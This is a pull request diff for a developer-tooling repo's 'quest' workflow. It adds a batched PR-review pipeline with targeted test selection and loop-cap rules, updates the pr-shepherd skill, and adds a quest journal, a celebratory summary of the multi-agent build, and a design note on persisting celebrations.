### PR TITLE
Add Phase 2 review intelligence: batched PR response + targeted validation

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -2,6 +2,8 @@
 .quest/
 .worktrees/
 
+.claude/scheduled_tasks.lock
+
 # Workspace scratch
 .ws/
 .quest-last-check

--- a/.quest-manifest
+++ b/.quest-manifest
@@ -76,6 +76,7 @@ scripts/quest_claude_bridge.py
 scripts/quest_claude_probe.py
 scripts/quest_claude_runner.py
 scripts/quest_review_intelligence.py
+scripts/quest_select_tests.py
 scripts/quest_startup_branch.py
 scripts/quest_checks/__init__.py
 scripts/quest_checks/cli.py

--- a/.quest-manifest
+++ b/.quest-manifest
@@ -82,6 +82,7 @@ scripts/quest_checks/cli.py
 scripts/quest_runtime/__init__.py
 scripts/quest_runtime/artifacts.py
 scripts/quest_runtime/claude_runner.py
+scripts/quest_runtime/pr_review_cycle.py
 scripts/quest_runtime/review_intelligence.py
 scripts/quest_runtime/state.py
 scripts/quest_celebrate/__init__.py

--- a/.skills/pr-shepherd/SKILL.md
+++ b/.skills/pr-shepherd/SKILL.md
@@ -53,7 +53,7 @@ Run the review loop through the canonical review-intelligence pipeline:
    - `python3 scripts/quest_review_intelligence.py build-fix-batches --backlog <review_backlog.json> --output <fix_batches.json>`
 5. Select concrete validation per actionable finding:
    - `python3 scripts/quest_select_tests.py --finding <finding.json> [--repo-inventory <repo_inventory.json>]`
-   - Persist returned `validation_steps` on backlog items before batching so validation scope is stable.
+   - Persist returned `validation_steps` on backlog items so validation scope is stable for execution.
 6. Execute one batch at a time:
    - Apply only that batch’s `fix_now` / `verify_first` items.
    - Run validation steps in order (Level 0 → Level 1 → Level 2 when present).

--- a/.skills/pr-shepherd/SKILL.md
+++ b/.skills/pr-shepherd/SKILL.md
@@ -37,8 +37,8 @@ Use **inline-first** commenting by default.
    - **Disagree?** → Reply on the comment with clear reasoning explaining why.
    - **Question/clarification?** → Reply on the comment with the answer.
 
-### Step 4.4: Canonical Intake → Decisions → Batches → Validation → Push
-Run the review loop through the canonical review-intelligence pipeline:
+### Step 4.4: Canonical Intake → Decisions → Validation → Batches → Push
+Run the review loop through the canonical review-intelligence pipeline. **Order matters:** validation steps must be attached to backlog items before batching, otherwise `build-fix-batches` falls back to one-item batches keyed by `finding_id` and the "batched PR response" behavior is lost.
 
 1. Collect one intake payload per cycle:
    - `ci_checks`
@@ -49,13 +49,15 @@ Run the review loop through the canonical review-intelligence pipeline:
    - `python3 scripts/quest_review_intelligence.py normalize-pr-intake --input <intake.json> --output <review_findings.json>`
 3. Build decision backlog with shared policy:
    - `python3 scripts/quest_review_intelligence.py build-backlog --findings <review_findings.json> --output <review_backlog.json>`
-4. Build actionable non-overlapping batches:
+4. Select concrete validation per actionable finding and persist onto the backlog:
+   - `python3 scripts/quest_review_intelligence.py select-batch-validation --backlog <review_backlog.json> [--repo-inventory <repo_inventory.json>]`
+   - Updates each actionable item's `validation_steps` in place so batching sees real signatures.
+   - Single-finding preview (debugging only): `python3 scripts/quest_select_tests.py --finding <finding.json> [--repo-inventory <repo_inventory.json>]`.
+5. Build actionable non-overlapping batches:
    - `python3 scripts/quest_review_intelligence.py build-fix-batches --backlog <review_backlog.json> --output <fix_batches.json>`
-5. Select concrete validation per actionable finding:
-   - `python3 scripts/quest_select_tests.py --finding <finding.json> [--repo-inventory <repo_inventory.json>]`
-   - Persist returned `validation_steps` on backlog items so validation scope is stable for execution.
+   - Items sharing `batch_key` + `validation_scope` signature group together, split by write-scope overlap as needed.
 6. Execute one batch at a time:
-   - Apply only that batch’s `fix_now` / `verify_first` items.
+   - Apply only that batch's `fix_now` / `verify_first` items.
    - Run validation steps in order (Level 0 → Level 1 → Level 2 when present).
    - Push once after that batch validates.
 7. Classify loop stop after each cycle:

--- a/.skills/pr-shepherd/SKILL.md
+++ b/.skills/pr-shepherd/SKILL.md
@@ -37,6 +37,32 @@ Use **inline-first** commenting by default.
    - **Disagree?** → Reply on the comment with clear reasoning explaining why.
    - **Question/clarification?** → Reply on the comment with the answer.
 
+### Step 4.4: Canonical Intake → Decisions → Batches → Validation → Push
+Run the review loop through the canonical review-intelligence pipeline:
+
+1. Collect one intake payload per cycle:
+   - `ci_checks`
+   - `inline_comments`
+   - `general_comments`
+   - `existing_findings`
+2. Normalize intake to canonical findings:
+   - `python3 scripts/quest_review_intelligence.py normalize-pr-intake --input <intake.json> --output <review_findings.json>`
+3. Build decision backlog with shared policy:
+   - `python3 scripts/quest_review_intelligence.py build-backlog --findings <review_findings.json> --output <review_backlog.json>`
+4. Build actionable non-overlapping batches:
+   - `python3 scripts/quest_review_intelligence.py build-fix-batches --backlog <review_backlog.json> --output <fix_batches.json>`
+5. Select concrete validation per actionable finding:
+   - `python3 scripts/quest_select_tests.py --finding <finding.json> [--repo-inventory <repo_inventory.json>]`
+   - Persist returned `validation_steps` on backlog items before batching so validation scope is stable.
+6. Execute one batch at a time:
+   - Apply only that batch’s `fix_now` / `verify_first` items.
+   - Run validation steps in order (Level 0 → Level 1 → Level 2 when present).
+   - Push once after that batch validates.
+7. Classify loop stop after each cycle:
+   - `python3 scripts/quest_review_intelligence.py classify-pr-stop --ci-state <green|failing|pending|unknown> --actionable <count> --iteration <n> --backlog <review_backlog.json>`
+   - If cap is enforced, classification handles in-place retagging and deferred backlog append for newly deferred findings.
+   - Continue only when classification outcome is `continue`.
+
 ### Step 4.5: Inline Commenting Playbook
 Use this for every inline review reply so comments feel coaching-oriented and actionable.
 
@@ -99,7 +125,7 @@ Inform the user the PR is ready for their review.
 - Never mark ready-for-review while CI is failing.
 - Never ignore review comments — always respond.
 - Keep fix commits small and focused; don't bundle unrelated changes.
-- If stuck in a loop (>3 fix iterations), stop and ask the user for guidance.
+- Use `classify-pr-stop` for loop-cap enforcement; do not prompt the user before cap retagging is applied. Prompt only if post-retag items still require `needs_human_decision`.
 
 ## Command Invocation
 

--- a/docs/quest-journal/celebrations/review-intel-phase-2_2026-04-17.md
+++ b/docs/quest-journal/celebrations/review-intel-phase-2_2026-04-17.md
@@ -1,0 +1,137 @@
+# Celebration — Review Intelligence Phase 2
+
+<!-- quest-id: review-intel-phase-2_2026-04-17__2101 -->
+<!-- pr: #94 -->
+<!-- style: celebration -->
+<!-- quality-tier: Gold -->
+<!-- date: 2026-04-17 -->
+<!-- journal: ../review-intel-phase-2_2026-04-17.md -->
+
+```
+██████╗ ██╗  ██╗ █████╗ ███████╗███████╗
+██╔══██╗██║  ██║██╔══██╗██╔════╝██╔════╝
+██████╔╝███████║███████║███████╗█████╗
+██╔═══╝ ██╔══██║██╔══██║╚════██║██╔══╝
+██║     ██║  ██║██║  ██║███████║███████╗
+╚═╝     ╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚══════╝
+
+          ████████╗██╗    ██╗ ██████╗
+          ╚══██╔══╝██║    ██║██╔═══██╗
+             ██║   ██║ █╗ ██║██║   ██║
+             ██║   ██║███╗██║██║   ██║
+             ██║   ╚███╔███╔╝╚██████╔╝
+             ╚═╝    ╚══╝╚══╝  ╚═════╝
+```
+
+🎉 🎉 🎉 🎉  🙌  🎉 🎉 🎉 🎉
+
+# Review Intelligence Phase 2 — SHIPPED
+
+**Quest ID:** `review-intel-phase-2_2026-04-17__2101`
+**Branch:** `quest/review-intel-phase-2` → PR **#94** (ready for review)
+**Commit:** `e1a578a`
+**Journal:** [`review-intel-phase-2_2026-04-17.md`](../review-intel-phase-2_2026-04-17.md)
+
+---
+
+## 📖 What Started This
+
+**Problem:** pr-shepherd previously iterated per-comment, ran whatever tests happened to feel right, and used only a generic ">3 iterations ask user" heuristic. Quest's canonical Phase 1 finding / decision / backlog language did not reach PR review intake at all.
+
+**Impact:** PR review and in-quest review now share one finding schema, one decision policy, one batch-key derivation, and one deferred-findings reservoir. pr-shepherd can no longer silently loop past the cap — remaining items are always converted to `defer` or `needs_human_decision` with full lineage persisted to `.quest/backlog/deferred_findings.jsonl` via the existing `append-deferred` CLI.
+
+**Reference:** [`ideas/2026-04-13-review-intelligence-canonical.md`](../../../ideas/2026-04-13-review-intelligence-canonical.md), Sections 3 & 4.
+
+---
+
+## 🎭 Starring Cast
+
+| Role | Model | Specialty |
+|---|---|---|
+| planner | Codex GPT-5.4 | **The Specification Sharpener** |
+| plan-reviewer-a | Claude Opus 4.7 (1M) | **The A Plan Critic** |
+| plan-reviewer-b | Codex GPT-5.4 | **The B Plan Critic** |
+| arbiter | Claude Opus 4.7 (1M) | **The Convergence Judge** |
+| builder | Codex GPT-5.4 | **The 648-Line Forge-Master** |
+| code-reviewer-a | Claude Opus 4.7 (1M) | **The A Code Critic** |
+| code-reviewer-b | Codex GPT-5.4 → Claude fallback | **The B Code Critic** (fell back mid-flight) |
+| fixer | Claude Opus 4.7 fallback | **The Two-Line Surgeon** |
+
+---
+
+## 🏆 Achievements Unlocked
+
+⭐️ **Convergent Reviewers (Claude × Codex)** — Both plan reviewers independently flagged the *same* six specification gaps. No whiplash, just signal.
+⭐️ **Truth-Table Cartographer** — Enumerated all 24 cells of `{green, failing, pending, unknown} × {0, >0} × {<cap, ==cap, >cap}` — and parametrized the matrix test for every single one.
+⭐️ **Phase 1 Reuse Purist (Codex)** — Zero decision-policy forks. `validate_findings`, `select_decision`, `_batch_from_finding`, `append_deferred_findings` all called by reference, never reimplemented.
+⭐️ **Directory-Scope Defender (Codex B)** — Caught the one-character bug that would have silently skipped Level 2 escalation for bare directory write_scope.
+⭐️ **Manifest Gate Keeper (Codex B)** — Found the missing `.quest-manifest` entry the full test suite never would.
+⭐️ **YAGNI Surgeon (Claude fallback)** — Touched exactly three files to fix two findings. Added one regression test. Moved on.
+⭐️ **Runtime Failover Survivor** — Codex MCP disconnected mid-session; Claude fallback picked up Reviewer B and Fixer slots without skipping a beat.
+⭐️ **351/351** — Full test suite green on both sides of the fix loop.
+
+---
+
+## 🎯 Impact Metrics
+
+📊 **1,694 insertions** across 10 files — production code, CLI, tests, skill, manifest, journal
+🧪 **59 targeted tests** (14 new in `test_pr_review_cycle.py`, 5 new in `test_quest_select_tests.py`) plus 2 regressions in `test_review_intelligence.py`
+🧪 **351/351** full suite passing
+🔧 **3 new CLI subcommands**: `normalize-pr-intake`, `build-fix-batches`, `classify-pr-stop`
+🔧 **1 new standalone CLI**: `scripts/quest_select_tests.py`
+🎯 **24-cell stop truth table** — every combination covered, iter>cap always stops, `pending`/`unknown` are explicitly non-green
+🔒 **No policy fork** — arbiter (in-quest review) and pr-shepherd (PR review) now share schema, decision policy, batch-key derivation, and deferred-findings reservoir
+📚 **pr-shepherd SKILL** gains canonical Step 4.4 (intake → decisions → batches → validation → push); retires the old ">3 iterations ask user" heuristic
+
+---
+
+## 📡 Handoff & Reliability Snapshot
+
+| Signal | Count |
+|---|---|
+| handoff.json files produced | 11 |
+| Reviewer handoffs (plan + code, both iterations) | 6 |
+| Fixer handoffs | 1 |
+| Findings tracked through canonical contract | 6 (plan) + 2 (code) |
+| Plan iterations | 2 |
+| Fix iterations | 1 |
+| Runtime fallbacks invoked | 2 (Codex → Claude for Code Reviewer B iter 2 + Fixer) |
+| State transition validator rejections | 1 (missing Reviewer B handoff — remediated in ~60s) |
+
+Stability: **Strong.** Codex MCP disappearing mid-session was the only curveball. Fallback behaved exactly as the workflow prescribed.
+
+---
+
+## 💎 Quest Quality Tier: **🥇 GOLD (B)**
+
+Two iterations on the plan (six convergent must_resolve gaps — every one fixed cleanly). One code-review iteration (two fix_now, both confirmed + patched without scope creep). Runtime failover mid-session, absorbed gracefully.
+
+Not Diamond or Platinum — the plan needed a real second pass and the builder left one bare-directory edge case. But the second pass was sharp, the fix pass was minimal, and the test suite stayed green throughout. A textbook Gold.
+
+---
+
+## 🗣️ The Quote
+
+> "Iteration 2: approve — CRB-001 and CRB-002 resolved; Reviewer A empty findings; full suite 351 passed; quest complete."
+>
+> — Arbiter, final verdict
+
+---
+
+## 📜 Carry-Over Findings
+
+No carry-over findings this round; nothing was inherited from earlier quests and nothing needs to be saved for the next one.
+
+---
+
+## ✨ Victory Narrative
+
+This quest proved that Phase 1's canonical contract was the right bet. Building pr-shepherd on top of it took zero policy forks — every piece (schema validation, decision selection, batch keying, deferred-findings lineage) slotted in by reference, not by reimplementation. The PR-review language and the in-quest-review language are now literally the same words.
+
+The two ecosystems — arbiter-driven quest review and pr-shepherd-driven PR review — now speak through one shared reservoir. A reviewer comment flagged on a PR, a failing CI check, and an in-quest finding from an arbiter all travel the same pipe: normalize → validate → decide → batch → validate → stop.
+
+And when the loop caps out, they defer the same way, to the same JSONL file, with the same lineage fields, where the same planner-startup scanner will surface them on the next quest that touches that code.
+
+One reservoir. Two producers. One consumer.
+
+🚀 **Victory Unlocked.** 🎮

--- a/docs/quest-journal/review-intel-phase-2_2026-04-17.md
+++ b/docs/quest-journal/review-intel-phase-2_2026-04-17.md
@@ -1,0 +1,104 @@
+# Quest Journal: Review Intelligence Phase 2 (Targeted Validation + Batched PR Response)
+
+- Quest ID: `review-intel-phase-2_2026-04-17__2101`
+- Completed: 2026-04-17
+- Mode: workflow
+- Quality: Gold
+- Outcome: Phase 2 of review-intelligence-canonical shipped. pr-shepherd now normalizes incoming review items into the canonical Phase 1 contract, decides per-finding action via the shared review-decisions policy, batches actionable fixes by write_scope + validation scope, runs the smallest falsifying checks (Level 0/1/2), and pushes once per validated batch with explicit bounded stop conditions.
+
+## What Shipped
+
+**Problem:** pr-shepherd previously iterated per-comment, ran whatever tests happened to feel right, and used only a generic ">3 iterations ask user" heuristic. Quest's canonical Phase 1 finding/decision/backlog language did not reach PR review intake at all.
+
+**Impact:** PR review and in-quest review now share one finding schema, one decision policy, one batch-key derivation, and one deferred-findings reservoir. pr-shepherd can no longer silently loop past the cap; remaining items are always converted to `defer` or `needs_human_decision` with full lineage persisted to `.quest/backlog/deferred_findings.jsonl` via the existing `append-deferred` CLI.
+
+## Files Changed
+
+- `.quest-manifest`
+- `.skills/pr-shepherd/SKILL.md` (new Step 4.4: canonical intake → decisions → batches → validation → push)
+- `scripts/README.md`
+- `scripts/quest_review_intelligence.py` (+3 subcommands)
+- `scripts/quest_runtime/pr_review_cycle.py` (new)
+- `scripts/quest_select_tests.py` (new CLI)
+- `tests/unit/test_pr_review_cycle.py` (new)
+- `tests/unit/test_quest_select_tests.py` (new)
+- `tests/unit/test_review_intelligence.py` (+regressions)
+
+## Iterations
+
+- Plan iterations: 2
+- Fix iterations: 1
+
+## Agents
+
+- **The Planner** (planner): Codex GPT-5.4
+- **Plan Reviewer A**: Claude Opus 4.7 (1M)
+- **Plan Reviewer B**: Codex GPT-5.4
+- **The Judge** (arbiter): Claude Opus 4.7 (1M)
+- **The Implementer** (builder): Codex GPT-5.4
+- **Code Reviewer A**: Claude Opus 4.7 (1M)
+- **Code Reviewer B**: Codex GPT-5.4 (iter 1) → Claude fallback (iter 2, Codex MCP disconnected mid-session)
+- **The Fixer** (fixer): Claude Opus 4.7 (1M) fallback (Codex unavailable)
+
+## Quest Brief
+
+Implement Phase 2 of review-intelligence-canonical: targeted validation and batched PR response.
+
+Reference: `ideas/2026-04-13-review-intelligence-canonical.md` (Section 3: Targeted Validation Strategy, Section 4: Bounded Fix-Loop Rules — PR shepherd loop)
+
+### Deliverables
+
+1. Normalize PR review intake (CI checks, inline comments, general comments, existing findings) into canonical `review_findings.json` matching Phase 1 schema.
+2. Emit `review_backlog.json` with decisions from the allowed set via the shared `review-decisions` policy (no policy fork).
+3. Batched fix loop: group `fix_now`/`verify_first` items by `write_scope` + validation scope; no overlapping `write_scope` per batch; one batch → one validation pass → one push.
+4. `scripts/quest_select_tests.py` helper returning ordered `validation_steps` across Level 0/1/2 with per-step reason; graceful degradation when scaffolding is missing.
+5. Explicit stop conditions for the pr-shepherd loop (24-cell truth table over `ci_state × actionable × iteration`, default cap 3). At cap every remaining finding is tagged `defer`, `needs_human_decision`, or accepted debt. No silent looping.
+6. Focused pytest coverage covering normalization, batching, select_tests heuristic, and stop-condition classification.
+
+### Integration Touchpoints
+
+- `.skills/pr-shepherd/SKILL.md` — new Step 4.4 canonical loop; cap-behavior guidance supersedes the old ">3 iterations ask user" text.
+- `scripts/quest_runtime/pr_review_cycle.py` — runtime helpers (`normalize_pr_review_intake`, `build_fix_batches`, `select_validation_steps`, `classify_pr_loop_stop`, `retag_backlog_at_cap`).
+- `scripts/quest_review_intelligence.py` — new subcommands: `normalize-pr-intake`, `build-fix-batches`, `classify-pr-stop`.
+- `scripts/quest_select_tests.py` — thin CLI wrapper over the selector.
+
+### Out of Scope
+
+- Review memory loading (`ideas/2026-04-13-quest-memory-architecture.md`). Follow-up quest.
+- Arbiter/planner changes beyond consuming Phase 1 contract.
+- Deep-review CI job additions (canonical Phase 3).
+- Backlog retention/staleness sweeps.
+- Rewriting pr-shepherd PR creation or approval-posting logic.
+
+## Plan Review Notes (iteration 1 → 2)
+
+Both reviewers converged on APPROVE WITH MUST_RESOLVE and independently flagged six specification-precision gaps: validation-scope equivalence definition + Phase 2/3 dependency inversion; cap-retag reuse + batch-key derivation; `write_scope` overlap semantics (prefix + trailing slash); 24-cell stop-condition truth table (pending/unknown + iter>cap); CLI-level test per new subcommand; intake source→canonical-field mapping + deterministic sort keys.
+
+Iteration 2 revision folded all six into the plan (merging former Phases 2 and 3, promoting overlap rule to AC3, adding the truth table to AC5, requiring `select_decision(..., at_loop_cap=True)` reuse, and adding an intake mapping table to AC1). Both reviewers approved iteration 2 clean.
+
+## Code Review Notes (iteration 1)
+
+- Reviewer A (Claude): APPROVE clean — every AC deliverable present, Phase 1 reuse verified end-to-end, all 24 stop-condition cells parametrized.
+- Reviewer B (Codex): 2 fix_now findings — both independently verified by the arbiter:
+  - **CRB-001**: `.quest-manifest` missing `scripts/quest_runtime/pr_review_cycle.py` → quality gate failed.
+  - **CRB-002**: `_scope_intersects_shared_boundary` used only `startswith(prefix)` against slash-suffixed prefixes, so bare-directory scopes (`scripts/quest_runtime`) skipped Level 2 escalation.
+
+Fixer addressed both strictly within scope, added one regression test for CRB-002, and confirmed all gates: manifest exit 0; targeted suite 59 passed (58 → 59); full suite 351 passed.
+
+## Validation
+
+- Manifest gate: `bash scripts/quest_validate-manifest.sh` → exit 0.
+- Targeted suite: `python3 -m pytest tests/unit/test_pr_review_cycle.py tests/unit/test_quest_select_tests.py tests/unit/test_review_intelligence.py -q` → 59 passed.
+- Full suite: `python3 -m pytest -q` → 351 passed, no warnings.
+- Findings schema: `python3 scripts/quest_review_intelligence.py validate-findings` → ok on all three phase artifacts.
+
+## Architecture Notes
+
+pr-shepherd and the quest arbiter now share:
+
+1. **Schema**: `validate_findings()` gates every finding regardless of source.
+2. **Decision policy**: `build_review_backlog()` / `select_decision()` is the single decision authority.
+3. **Batch-key derivation**: `_batch_from_finding()` (first sorted write_scope, fallback path, then "misc").
+4. **Cap behavior**: both consumers route through `select_decision(..., at_loop_cap=True)` and persist deferred-at-cap entries through the same `append-deferred` CLI.
+
+The `quest_select_tests` helper is deterministic (pure function over finding + optional repo inventory) and degrades gracefully when scaffolding is missing — Level 0 guards are always emitted, falling back to `true` with an explicit reason string when commands are not declared.

--- a/docs/quest-journal/review-intel-phase-2_2026-04-17.md
+++ b/docs/quest-journal/review-intel-phase-2_2026-04-17.md
@@ -4,6 +4,8 @@
 - Completed: 2026-04-17
 - Mode: workflow
 - Quality: Gold
+- PR: [#94](https://github.com/KjellKod/quest/pull/94)
+- Celebration: [`celebrations/review-intel-phase-2_2026-04-17.md`](celebrations/review-intel-phase-2_2026-04-17.md)
 - Outcome: Phase 2 of review-intelligence-canonical shipped. pr-shepherd now normalizes incoming review items into the canonical Phase 1 contract, decides per-finding action via the shared review-decisions policy, batches actionable fixes by write_scope + validation scope, runs the smallest falsifying checks (Level 0/1/2), and pushes once per validated batch with explicit bounded stop conditions.
 
 ## What Shipped

--- a/ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md
+++ b/ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md
@@ -164,7 +164,7 @@ Alternative order: celebration fires FIRST, journal is written SECOND with the c
    - `/celebrate` on a quest that has a `step7-original` file:
      - Detect meaningful context change since the original (new commits on branch, PR comments, merged/closed state). Cheap checks only — `git log`, `gh pr view`.
      - **No new context** → warn "original celebration is authoritative and nothing meaningful has changed since; the current regeneration has less context than the original. Overwrite anyway? (y/N)" with default **no**.
-     - **New context exists** → offer a revision mode: append `## Revision: <date>` section to the existing file *or* write a sibling `<slug>_<date>__revision-<YYYYMMDD>.md`. Pick per invocation. Mark the revision's `origin:` as `post-pr-revision` and add a `revision-of:` frontmatter pointer.
+     - **New context exists** → offer a revision mode: append `## Revision: <date>` to the existing file (keep the original frontmatter intact; include revision metadata — date, reason, author — inline in the section body) *or* write a sibling `<slug>_<date>__revision-<YYYYMMDD>.md` with `origin: post-pr-revision` and `revision-of: <original-path>` in its own frontmatter. Pick per invocation.
    - `/celebrate` on a quest that has a `cold-regen` file: normal overwrite prompt (cold can replace cold).
    - In all cases, *render the proposed celebration before any write* so the user can see what they'd be replacing.
 
@@ -220,7 +220,7 @@ Journal-backed quests (richer source material for the celebration) are marked `�
 | `validate-and-launch_2026-02-04__1045` | ✓ |
 | `weekly-update-check_2026-02-04__2349` | — |
 
-Totals: **35** archived quests without celebrations; **21** have journals, **14** do not.
+Totals: **35** archived quests without celebrations; **20** have journals, **15** do not.
 
 The three `codex-bridge-smoke*` quests and `codex-claude-bridge` look like rapid re-runs during the Codex bridge work on 2026-03-09 — only the last (or `codex-led-claude-bridge-runtime-hardening`, which has a journal) is worth celebrating. Safe to skip the smoke-test duplicates.
 

--- a/ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md
+++ b/ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md
@@ -138,20 +138,87 @@ Alternative order: celebration fires FIRST, journal is written SECOND with the c
 - Auto-publishing celebrations anywhere external
 - Changing the tier scale or the ASCII art rules
 
-## Open Questions
+## Decided Defaults (2026-04-18)
 
-1. **Ordering:** does the celebration fire before or after the journal write? The cleaner path is celebration-first (journal references a real file), but celebration is currently user-triggered (`/celebrate`). Options: auto-celebrate at Step 7 (default on) with an opt-out; or leave celebration user-triggered but have the journal write a placeholder that fills in on next celebration.
-2. **Auto-trigger on quest complete:** should Step 7 invoke `/celebrate` automatically? This raises the question of what happens if the user does not want a celebration (e.g., small fix quests). Leaning: yes for `workflow` mode, optional for `solo`, with an allowlist gate.
-3. **Backfill of existing quests:** there are ~10 archived quests without celebrations. A one-time `scripts/quest_backfill_celebrations.py` similar to the existing `quest_backfill_journal.py` could generate them. Worth its own small quest slice.
-4. **Dashboard surfacing:** should the dashboard embed the celebration (heavy) or just link to it (light)? Light link is safer; avoid inflating dashboard payload.
-5. **Filename collisions:** if two quests complete on the same date with the same slug root (rare but possible with solo vs workflow re-runs), include the `__HHMM` part of the quest ID in the celebration filename. Align with whatever the journal naming already does.
+1. **Ordering — celebration-first, journal-second.** At Step 7, generate the celebration *before* the journal is written so the journal's `Celebration:` link always points to an existing file. No placeholder pattern.
+
+2. **Auto-trigger — allowlist-gated, solo always asks.** Add an `allowlist.celebration.auto` boolean:
+   - `celebration.auto: true` → run automatically at Step 7 (render + persist).
+   - `celebration.auto: false` → *always prompt* "celebrate now?" at Step 7. Never silently skip.
+   - **Solo mode override:** always prompt regardless of the flag. Solo quests are often polish-only and do not deserve auto-ceremony.
+   - The celebration *file is always written* when the skill runs. The allowlist flag controls whether it *renders in chat* automatically or waits for the prompt.
+
+3. **Backfill — manual only (user-driven).** No batch script in the first pass. User will run `/celebrate <archived-id>` for past quests on demand. A backfill script can be promoted later if the batch need emerges. See the list of backfill candidates below.
+
+4. **Dashboard — link only.** A `Celebration:` line per quest that links to the file. No inline excerpts, no full rendering. The dashboard is a navigation surface, not a reader.
+
+5. **Filename — `<slug>_<date>.md` (matches journal).** When re-running `/celebrate` on a quest that already has a celebration file:
+   - Render the new celebration and show it to the user.
+   - Prompt: "Replace existing celebration at `<path>`? (y/n)"
+   - On yes, overwrite.
+   - On no, abort without saving.
+   - No `__v2` suffix files; overwrite is the right behavior for a regenerable artifact (git preserves history).
+
+## Backfill Candidates (as of 2026-04-18)
+
+35 archived quests under `.quest/archive/` lack a celebration file. User can invoke `/celebrate <id>` on any of these when they feel like reminiscing.
+
+See [Appendix A](#appendix-a-backfill-candidates) at the bottom of this doc for the full list.
+
+## Appendix A: Backfill Candidates
+
+These 35 quests exist under `.quest/archive/` with no matching celebration file. Listed newest-first for convenience. Run `/celebrate <quest-id>` on any that feel worth preserving.
+
+Journal-backed quests (richer source material for the celebration) are marked `✓`. Celebrations can still be generated for quests without a journal — the skill will fall back to the archive handoffs and quest_brief.
+
+| Quest ID | Journal |
+|---|---|
+| `review-intelligence-canonical_2026-04-16__0218` | ✓ |
+| `celebration-review-intel_2026-04-16__0828` | ✓ |
+| `claude-insights-ideas_2026-04-15__1629` | ✓ |
+| `quest-dashboard-briefs_2026-04-15__2048` | — |
+| `feedback-intent-routing_2026-04-13__1101` | ✓ |
+| `prompt-surface-consolidation_2026-04-13__1701` | ✓ |
+| `caveman-review_2026-04-12__1353` | ✓ |
+| `multi-cleanup_2026-04-11__1049` | ✓ |
+| `ci-review-severity_2026-04-06__1820` | — |
+| `quest-housekeeping-blitz_2026-03-21__0600` | ✓ |
+| `artifact-runtime-fallbacks_2026-03-17__1416` | — |
+| `artifact-prep-runtime_2026-03-17__0518` | — |
+| `legion-manifesto-review_2026-03-09__1314` | — |
+| `codex-led-claude-bridge-runtime-hardening_2026-03-09__1039` | ✓ |
+| `claude-runtime-dispatch_2026-03-09__1236` | — |
+| `codex-bridge-smoke_2026-03-09__1032` | — |
+| `codex-bridge-smoke-v2_2026-03-09__1021` | — |
+| `codex-bridge-smoke_2026-03-09__1012` | — |
+| `codex-claude-bridge_2026-03-09__0935` | — |
+| `celebrate-v2_2026-03-05__0643` | ✓ |
+| `pr-inline-commenting-playbook_2026-03-05__0250` | ✓ |
+| `quest-next-architecture_2026-03-05__2353` | — |
+| `quest-completion-animations_2026-03-04__1953` | ✓ |
+| `opencode-model-suitability_2026-02-28__1755` | ✓ |
+| `model-suitability-guide_2026-02-28__2016` | — |
+| `phase4-role-wiring_2026-02-17__2218` | — |
+| `quest-dashboard_2026-02-11__0936` | — |
+| `handoff-contract-fix_2026-02-09__2228` | ✓ |
+| `thin-orchestrator_2026-02-09__1845` | ✓ |
+| `skill-strategy_2026-02-09__1200` | ✓ |
+| `installer-script_2026-02-04__1841` | ✓ |
+| `ci-quest-validation_2026-02-04__1532` | ✓ |
+| `interactive-plan-presentation_2026-02-04__1516` | ✓ |
+| `validate-and-launch_2026-02-04__1045` | ✓ |
+| `weekly-update-check_2026-02-04__2349` | — |
+
+Totals: **35** archived quests without celebrations; **21** have journals, **14** do not.
+
+The three `codex-bridge-smoke*` quests and `codex-claude-bridge` look like rapid re-runs during the Codex bridge work on 2026-03-09 — only the last (or `codex-led-claude-bridge-runtime-hardening`, which has a journal) is worth celebrating. Safe to skip the smoke-test duplicates.
 
 ## Follow-Up Quest Prompt (Draft)
 
 ```text
 /quest "Persist quest celebrations to disk with embedded brief and journal cross-links.
 
-Reference: ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md
+Reference: ideas/2026-04-17-persisted-celebrations-and-brief-in-cheers.md (see Decided Defaults)
 Pattern reference (light): ../doc2md/docs/journal/ + docs/quest-journal/ directory structure.
 
 DELIVERABLES
@@ -163,31 +230,40 @@ DELIVERABLES
 2. Persist the rendered celebration to
    docs/quest-journal/celebrations/<slug>_<date>.md with frontmatter
    (quest-id, pr, style=celebration, quality-tier, date, journal pointer).
-   Re-runs are idempotent (overwrite, do not append).
+   When the file already exists: render the new celebration, show it to the
+   user, and prompt 'Replace existing celebration at <path>? (y/n)'. No
+   __v2 suffix files.
 
-3. Update .skills/quest/delegation/workflow.md Step 7 to include a
-   'Celebration: <path>' link in the journal header when a celebration file
-   exists or is about to be produced.
+3. Update .skills/quest/delegation/workflow.md Step 7 to:
+   (a) run the celebration BEFORE writing the journal (celebration-first order)
+       so the journal's Celebration link always points at a real file;
+   (b) include a 'Celebration: <path>' line in the journal header;
+   (c) gate auto-run on allowlist.celebration.auto:
+       - true  -> run automatically (render + persist);
+       - false -> always prompt 'celebrate now?' (never silently skip);
+       - solo  -> always prompt regardless of the flag.
 
-4. New helper scripts/quest_celebrate/persist.py (or equivalent) that takes
+4. Add allowlist.celebration.auto (boolean, default true) to .ai/allowlist.json
+   schema. Document it in the allowlist reference.
+
+5. New helper scripts/quest_celebrate/persist.py (or equivalent) that takes
    the rendered markdown plus quest archive path and writes the celebration
    file with correct frontmatter.
 
-5. Dashboard integration: scripts/quest_dashboard/ surfaces the celebration
-   link per quest by reading the journal's Celebration line. Read-only — do not
-   embed full content.
-
-6. Backfill script scripts/quest_backfill_celebrations.py that walks
-   .quest/archive/ and generates missing celebration files from available
-   handoffs and the brief. Optional companion to quest_backfill_journal.py.
+6. Dashboard integration: scripts/quest_dashboard/ surfaces the celebration
+   as a link per quest by reading the journal's Celebration line.
+   **Link only, no inline embedding.**
 
 7. Focused tests under tests/ for: brief extraction edge cases (no heading,
-   one-line prompt, Problem+Impact pair), celebration persistence (idempotent
-   overwrite, frontmatter shape), journal↔celebration link pairing,
-   backfill script happy path + skipping cases.
+   one-line prompt, Problem+Impact pair), celebration persistence (overwrite
+   prompt, frontmatter shape), journal<->celebration link pairing, allowlist
+   flag behavior (auto-run vs prompt vs solo override), overwrite-prompt
+   accept/decline flows.
 
 OUT OF SCOPE
 
+- Backfill script for archived quests (user does this manually via /celebrate
+  <archived-id>; promote to script only if batch need emerges).
 - Dual-persona voices (no Dexter-style requiem).
 - Dashboard content embedding (links only).
